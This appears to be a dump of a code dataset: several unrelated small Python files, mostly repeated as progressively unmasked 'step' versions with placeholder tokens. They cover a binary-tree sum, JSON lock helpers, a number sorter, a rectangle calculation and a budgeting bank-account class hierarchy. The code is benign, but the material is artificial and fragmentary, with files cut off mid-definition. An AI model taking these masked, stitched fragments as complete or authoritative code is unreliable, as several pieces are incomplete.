str(cnt))\n output_file = open(path, 'wb')\n obj = {\"x_steer\": x[j], \"y_steer\": y[j],\n \"x_utm\": x_real[j], \"y_utm\": y_real[j],\n \"img\": imgs[j][k]}\n pickle.dump(obj, output_file)\n output_file.close()\n\n print(\"* Video %d done, %s\" %( i, jsons[i]))\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(args.src) if file.endswith(\".json\")])\n construct_maps(jsons)\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @return an integer
sum = 0
def sumNumbers(self, root):
def dfs(root,sofar):
if root.left is None and root.right is None:
self.sum += int(''.join(map(str,sofar+[root.val])))
return
if root.left is not None:
dfs(root.left,sofar+[root.val])
if root.right is not None:
dfs(root.right,sofar+[root.val])
if root is None:
return 0
dfs(root,[])
return self.sum
|
normal
|
{
"blob_id": "e6ac742eb74d5d18e4c304a8ea1331e7e16e403d",
"index": 2317,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n <mask token>\n",
"step-3": "class Solution:\n <mask token>\n\n def sumNumbers(self, root):\n\n def dfs(root, sofar):\n if root.left is None and root.right is None:\n self.sum += int(''.join(map(str, sofar + [root.val])))\n return\n if root.left is not None:\n dfs(root.left, sofar + [root.val])\n if root.right is not None:\n dfs(root.right, sofar + [root.val])\n if root is None:\n return 0\n dfs(root, [])\n return self.sum\n",
"step-4": "class Solution:\n sum = 0\n\n def sumNumbers(self, root):\n\n def dfs(root, sofar):\n if root.left is None and root.right is None:\n self.sum += int(''.join(map(str, sofar + [root.val])))\n return\n if root.left is not None:\n dfs(root.left, sofar + [root.val])\n if root.right is not None:\n dfs(root.right, sofar + [root.val])\n if root is None:\n return 0\n dfs(root, [])\n return self.sum\n",
"step-5": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return an integer\n sum = 0\n def sumNumbers(self, root):\n def dfs(root,sofar):\n if root.left is None and root.right is None:\n self.sum += int(''.join(map(str,sofar+[root.val])))\n return\n if root.left is not None:\n dfs(root.left,sofar+[root.val])\n if root.right is not None:\n dfs(root.right,sofar+[root.val])\n if root is None:\n return 0\n dfs(root,[])\n return self.sum\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def corec_unlock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def corec_set(parameter, value):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
params[parameter] = value
with open(params_fn, 'w') as f:
json.dump(params, f, indent=4)
def corec_get(parameter):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
if parameter in params:
return params[parameter]
return None
<|reserved_special_token_0|>
def corec_unlock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def corec_set(parameter, value):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
params[parameter] = value
with open(params_fn, 'w') as f:
json.dump(params, f, indent=4)
def corec_get(parameter):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
if parameter in params:
return params[parameter]
return None
def corec_lock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = True
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
def corec_unlock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
<|reserved_special_token_1|>
import json
def corec_set(parameter, value):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
params[parameter] = value
with open(params_fn, 'w') as f:
json.dump(params, f, indent=4)
def corec_get(parameter):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
if parameter in params:
return params[parameter]
return None
def corec_lock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = True
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
def corec_unlock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
<|reserved_special_token_1|>
import json
def corec_set(parameter, value):
params_fn = "corec_parameters.json"
with open(params_fn) as f:
params = json.load(f)
params[parameter] = value
with open(params_fn, 'w') as f:
json.dump(params, f, indent=4)
def corec_get(parameter):
params_fn = "corec_parameters.json"
with open(params_fn) as f:
params = json.load(f)
if parameter in params:
return params[parameter]
return None
def corec_lock(lock):
locks_fn = "corec_locks.json"
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = True
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
def corec_unlock(lock):
locks_fn = "corec_locks.json"
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
|
flexible
|
{
"blob_id": "88b3dd7414a68de65bafb317fbd4da2b1bc933fc",
"index": 991,
"step-1": "<mask token>\n\n\ndef corec_unlock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = False\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n",
"step-2": "<mask token>\n\n\ndef corec_set(parameter, value):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n params[parameter] = value\n with open(params_fn, 'w') as f:\n json.dump(params, f, indent=4)\n\n\ndef corec_get(parameter):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n if parameter in params:\n return params[parameter]\n return None\n\n\n<mask token>\n\n\ndef corec_unlock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = False\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n",
"step-3": "<mask token>\n\n\ndef corec_set(parameter, value):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n params[parameter] = value\n with open(params_fn, 'w') as f:\n json.dump(params, f, indent=4)\n\n\ndef corec_get(parameter):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n if parameter in params:\n return params[parameter]\n return None\n\n\ndef corec_lock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = True\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n\n\ndef corec_unlock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = False\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n",
"step-4": "import json\n\n\ndef corec_set(parameter, value):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n params[parameter] = value\n with open(params_fn, 'w') as f:\n json.dump(params, f, indent=4)\n\n\ndef corec_get(parameter):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n if parameter in params:\n return params[parameter]\n return None\n\n\ndef corec_lock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = True\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n\n\ndef corec_unlock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = False\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n",
"step-5": "\nimport json\n\ndef corec_set(parameter, value):\n\n\tparams_fn = \"corec_parameters.json\"\n\n\twith open(params_fn) as f:\n\t\tparams = json.load(f)\n\n\tparams[parameter] = value\n\n\twith open(params_fn, 'w') as f:\n\t\tjson.dump(params, f, indent=4)\n\ndef corec_get(parameter):\n\n\tparams_fn = \"corec_parameters.json\"\n\n\twith open(params_fn) as f:\n\t\tparams = json.load(f)\n\n\tif parameter in params:\n\t\treturn params[parameter]\n\n\treturn None\n\ndef corec_lock(lock):\n\tlocks_fn = \"corec_locks.json\"\n\n\twith open(locks_fn) as f:\n\t\tlocks = json.load(f)\n\n\tlocks[lock] = True\n\n\twith open(locks_fn, 'w') as f:\n\t\tjson.dump(locks, f, indent=4)\n\ndef corec_unlock(lock):\n locks_fn = \"corec_locks.json\"\n\n with open(locks_fn) as f:\n locks = json.load(f)\n\n locks[lock] = False\n\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n\n\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# 30 - Faça um programa que receba três números e mostre - os em ordem crescentes.
n1 = int(input("Digite o primeiro número: "))
n2 = int(input("Digite o segundo número: "))
n3 = int(input("Digite o terceiro número: "))
if n1 <= n2 and n2 <= n3:
print(f'A ordem crescente é {n1}, {n2}, {n3}')
elif n1 <= n3 and n3 <= n2:
print(f'A ordem crescente é {n1}, {n3}, {n2}')
elif n2 <= n1 and n1 <= n3:
print(f'A ordem crescente é {n2}, {n1}, {n3}')
elif n2 <= n3 and n3 <= n1:
print(f'A ordem crescente é {n2}, {n3}, {n1}')
elif n3 <= n1 and n1 <= n2:
print(f'A ordem crescente é {n3}, {n1}, {n2}')
elif n3 <= n2 and n2 <= n1:
print(f'A ordem crescente é {n3}, {n2}, {n1}')
|
normal
|
{
"blob_id": "09712a397ad7915d9865b4aebf16606f85988f67",
"index": 2737,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif n1 <= n2 and n2 <= n3:\n print(f'A ordem crescente é {n1}, {n2}, {n3}')\nelif n1 <= n3 and n3 <= n2:\n print(f'A ordem crescente é {n1}, {n3}, {n2}')\nelif n2 <= n1 and n1 <= n3:\n print(f'A ordem crescente é {n2}, {n1}, {n3}')\nelif n2 <= n3 and n3 <= n1:\n print(f'A ordem crescente é {n2}, {n3}, {n1}')\nelif n3 <= n1 and n1 <= n2:\n print(f'A ordem crescente é {n3}, {n1}, {n2}')\nelif n3 <= n2 and n2 <= n1:\n print(f'A ordem crescente é {n3}, {n2}, {n1}')\n",
"step-3": "n1 = int(input('Digite o primeiro número: '))\nn2 = int(input('Digite o segundo número: '))\nn3 = int(input('Digite o terceiro número: '))\nif n1 <= n2 and n2 <= n3:\n print(f'A ordem crescente é {n1}, {n2}, {n3}')\nelif n1 <= n3 and n3 <= n2:\n print(f'A ordem crescente é {n1}, {n3}, {n2}')\nelif n2 <= n1 and n1 <= n3:\n print(f'A ordem crescente é {n2}, {n1}, {n3}')\nelif n2 <= n3 and n3 <= n1:\n print(f'A ordem crescente é {n2}, {n3}, {n1}')\nelif n3 <= n1 and n1 <= n2:\n print(f'A ordem crescente é {n3}, {n1}, {n2}')\nelif n3 <= n2 and n2 <= n1:\n print(f'A ordem crescente é {n3}, {n2}, {n1}')\n",
"step-4": "# 30 - Faça um programa que receba três números e mostre - os em ordem crescentes.\n\nn1 = int(input(\"Digite o primeiro número: \"))\nn2 = int(input(\"Digite o segundo número: \"))\nn3 = int(input(\"Digite o terceiro número: \"))\n\nif n1 <= n2 and n2 <= n3:\n print(f'A ordem crescente é {n1}, {n2}, {n3}')\nelif n1 <= n3 and n3 <= n2:\n print(f'A ordem crescente é {n1}, {n3}, {n2}')\nelif n2 <= n1 and n1 <= n3:\n print(f'A ordem crescente é {n2}, {n1}, {n3}')\nelif n2 <= n3 and n3 <= n1:\n print(f'A ordem crescente é {n2}, {n3}, {n1}')\nelif n3 <= n1 and n1 <= n2:\n print(f'A ordem crescente é {n3}, {n1}, {n2}')\nelif n3 <= n2 and n2 <= n1:\n print(f'A ordem crescente é {n3}, {n2}, {n1}')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
print(1)
print(2)
print("Jenkins")
print("Jenkins2")
print("Jenkins3")
print("Jenkins44")
print("Jenkins55khlk")
print("3333333")
print("44444444")
print("jhjhj")
|
normal
|
{
"blob_id": "77a82f99ab10e3d53e3f8466d43b67e8b87c1588",
"index": 2418,
"step-1": "<mask token>\n",
"step-2": "print(1)\nprint(2)\nprint('Jenkins')\nprint('Jenkins2')\nprint('Jenkins3')\nprint('Jenkins44')\nprint('Jenkins55khlk')\nprint('3333333')\nprint('44444444')\nprint('jhjhj')\n",
"step-3": "print(1)\nprint(2)\nprint(\"Jenkins\")\nprint(\"Jenkins2\")\nprint(\"Jenkins3\")\nprint(\"Jenkins44\")\nprint(\"Jenkins55khlk\")\n\nprint(\"3333333\")\nprint(\"44444444\")\n\nprint(\"jhjhj\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.apps import AppConfig
class ScambioConfig(AppConfig):
name = 'scambio'
|
normal
|
{
"blob_id": "b091d00f5b5e997de87b36adbe9ce603a36ca49c",
"index": 3347,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ScambioConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ScambioConfig(AppConfig):\n name = 'scambio'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass ScambioConfig(AppConfig):\n name = 'scambio'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
subjects = []
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
<|reserved_special_token_1|>
import json
subjects = []
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
<|reserved_special_token_1|>
import json
subjects = []
with open("sub.json", 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',',':')))
|
flexible
|
{
"blob_id": "98bd4eb25a76fb9184f9abfcb920a6fbe46b9394",
"index": 631,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('sub.json', 'r') as subject_file:\n subjects = json.load(subject_file)\nprint(json.dumps(subjects, separators=(',', ':')))\n",
"step-3": "<mask token>\nsubjects = []\nwith open('sub.json', 'r') as subject_file:\n subjects = json.load(subject_file)\nprint(json.dumps(subjects, separators=(',', ':')))\n",
"step-4": "import json\nsubjects = []\nwith open('sub.json', 'r') as subject_file:\n subjects = json.load(subject_file)\nprint(json.dumps(subjects, separators=(',', ':')))\n",
"step-5": "import json\n\nsubjects = []\n\nwith open(\"sub.json\", 'r') as subject_file:\n\tsubjects = json.load(subject_file)\n\nprint(json.dumps(subjects, separators=(',',':')))\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('Perimeter is ' + str(perimeter) + ', Area is ' + str(area))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
x, y = 2.4, 6.4
perimeter = x * 2 + y * 2
area = x * y
print('Perimeter is ' + str(perimeter) + ', Area is ' + str(area))
<|reserved_special_token_1|>
'''
Write the necessary code to display the area and perimeter of a rectangle that has a width of 2.4 and a height of 6.4.
'''
x, y = 2.4, 6.4
perimeter = (x*2)+(y*2)
area = x*y
print("Perimeter is "+str(perimeter) + ", Area is " + str(area))
|
flexible
|
{
"blob_id": "a7de079866d7ac80260b438043cf0403f598cebc",
"index": 5091,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Perimeter is ' + str(perimeter) + ', Area is ' + str(area))\n",
"step-3": "<mask token>\nx, y = 2.4, 6.4\nperimeter = x * 2 + y * 2\narea = x * y\nprint('Perimeter is ' + str(perimeter) + ', Area is ' + str(area))\n",
"step-4": "'''\n\nWrite the necessary code to display the area and perimeter of a rectangle that has a width of 2.4 and a height of 6.4.\n\n'''\nx, y = 2.4, 6.4\nperimeter = (x*2)+(y*2)\narea = x*y\nprint(\"Perimeter is \"+str(perimeter) + \", Area is \" + str(area))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class AngelBankAccount(BankAccount):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.
TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() ->BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) ->BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print(
'Bank balance must be greater than or equal to 0! Please enter again!'
)
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](bank_account_no, bank_name,
bank_balance, budget_manager)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BankAccount(ABC):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _lock_budget(self, budget: Budget) ->None:
"""
Locks a budget.
:param budget: a Budget, the budget to be locked
:return: None
"""
budget.lock()
print(f'Your {budget.name} budget has now been locked!')
<|reserved_special_token_0|>
def get_budgets(self) ->list:
"""
Returns a list of budgets.
:return: a list of Budget objects
"""
return self.budget_manager.get_budgets()
<|reserved_special_token_0|>
class AngelBankAccount(BankAccount):
"""
This bank account is designed for Angel users. The Angel user
represents a user who's parents are not worried at all.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Never gets locked out of a budget category. They can continue
spending money even if they exceed the budget in question.
- Gets politely notified if they exceed a budget category.
- Gets a warning if they exceed more than 90% of a budget.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.9:
self._warn_nearing_exceed_budget(budget, 90)
self.print_transactions_for_review(budget)
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.
TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() ->BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) ->BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print(
'Bank balance must be greater than or equal to 0! Please enter again!'
)
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](bank_account_no, bank_name,
bank_balance, budget_manager)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BankAccount(ABC):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@abstractmethod
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Contains the logic to check if a warning or notification should
be issued to the user. It also locks a budget or this bank
account if needed. The exact algorithm would vary bank account
to bank account.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
pass
<|reserved_special_token_0|>
def _warn_nearing_exceed_budget(self, budget: Budget, exceeded_percent: int
) ->None:
"""
Issues a warning to the user that they are about to exceed this
budget.
:param budget: a Budget, the budget that they are about to
exceed
:param exceeded_percent: an int, the percent that they have
already exceeded
:return: None
"""
print(
f'[WARNING] You are about to exceed the {budget.name} budget! You went over {exceeded_percent}% of the total ${budget.total_amount}.'
)
<|reserved_special_token_0|>
def _lock_budget(self, budget: Budget) ->None:
"""
Locks a budget.
:param budget: a Budget, the budget to be locked
:return: None
"""
budget.lock()
print(f'Your {budget.name} budget has now been locked!')
def get_transactions_by_budget(self, category: BudgetCategory) ->list:
"""
Returns a list of transactions for the given budget category.
:param category: a BudgetCategory
:return: a list of Transaction, the transactions in that
category
"""
return [transaction for transaction in self.transactions if
transaction.budget_category == category]
def get_budgets(self) ->list:
"""
Returns a list of budgets.
:return: a list of Budget objects
"""
return self.budget_manager.get_budgets()
<|reserved_special_token_0|>
class AngelBankAccount(BankAccount):
"""
This bank account is designed for Angel users. The Angel user
represents a user who's parents are not worried at all.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Never gets locked out of a budget category. They can continue
spending money even if they exceed the budget in question.
- Gets politely notified if they exceed a budget category.
- Gets a warning if they exceed more than 90% of a budget.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.9:
self._warn_nearing_exceed_budget(budget, 90)
self.print_transactions_for_review(budget)
class TroublemakerBankAccount(BankAccount):
"""
This bank account is designed for Troublemaker children. These
children often find themselves in trouble. These are usually minor
incidents and their parents are concerned but not worried.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- Gets a warning if they exceed more than 75% of a budget
category.
- Gets politely notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 120% of the amount assigned to the
budget in question.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1.2:
self._lock_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self.print_transactions_for_review(budget)
elif exceeded_ratio > 0.75:
self._warn_nearing_exceed_budget(budget, 75)
self.print_transactions_for_review(budget)
class RebelBankAccount(BankAccount):
"""
This bank account is designed for Rebel children. The Rebel
represents a child who refuses to follow any rules and believes that
society should be broken down and restructured. Parents of these
children are quite worried about them.
"""
def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:
"""
Issues a warning or locks budget/bank account when these
conditions are met:
- They get a warning for every transaction after exceeding 50%
of a budget.
- Gets ruthlessly notified if they exceed a budget category.
- Gets locked out of conducting transactions in a budget
category if they exceed it by 100% of the amount assigned to the
budget in question.
- If they exceed their budget in 2 or more categories then they
get locked out of their account completely.
:param transaction: a Transaction, the newly recorded
transaction
:return: None
"""
budget = self.budget_manager.get_budget(transaction.budget_category)
exceeded_ratio = budget.exceeded_ratio
if exceeded_ratio > 1:
self._notify_exceeded_budget(budget)
self._lock_budget(budget)
self.print_transactions_for_review(budget)
if self.budget_manager.no_locked_budgets >= 2:
self._locked = True
print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')
elif exceeded_ratio > 0.5:
self._warn_nearing_exceed_budget(budget, 50)
self.print_transactions_for_review(budget)
class BankAccountCreator:
"""
An utility class that helps create a BankAccount.
"""
_user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.
TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount
}
"""
A dictionary that maps a UserType enum to an appropriate BankAccount
class.
"""
@staticmethod
def load_test_account() ->BankAccount:
"""
Creates and returns a test bank account.
:return: a BankAccount
"""
budget_manager = BudgetCreator.load_test_budget_manager()
return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)
@classmethod
def create_bank_account(cls, user_type: UserType) ->BankAccount:
"""
Prompts the user for bank account details, initializes a Bank
Account based on the given user type and returns it.
:param user_type: a UserType
:return: a BankAccount
"""
bank_account_no = input('Enter bank account number: ')
bank_name = input('Enter bank name: ')
bank_balance = -1
while bank_balance < 0:
bank_balance = float(input('Enter bank balance: '))
if bank_balance < 0:
print(
'Bank balance must be greater than or equal to 0! Please enter again!'
)
budget_manager = BudgetCreator.create_budget_manager()
return cls._user_type_mapper[user_type](bank_account_no, bank_name,
bank_balance, budget_manager)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BankAccount(ABC):
<|reserved_special_token_0|>
def __init__(self, bank_account_no: str, bank_name: str, bank_balance:
float, budget_manager: BudgetManager):
"""
Initializes a bank account.
:param bank_account_no: a string
